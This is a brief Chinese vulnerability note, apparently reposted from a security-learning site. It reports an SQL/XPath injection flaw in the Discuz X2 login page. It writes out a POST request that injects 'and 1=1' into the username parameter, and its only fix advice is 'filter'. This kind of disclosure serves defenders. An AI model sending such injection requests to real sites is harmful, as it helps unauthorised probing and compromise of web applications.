漏洞类型:SQL注入/Xpath 请求方式:POST 影响页面: http://HdhCmsTest2cto测试数据 /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes 参数:username 参数测试:and 1=1 攻击细节:username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield
修复:
过滤
查看更多关于Discuz X2 SQL注入/Xpath缺陷及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11538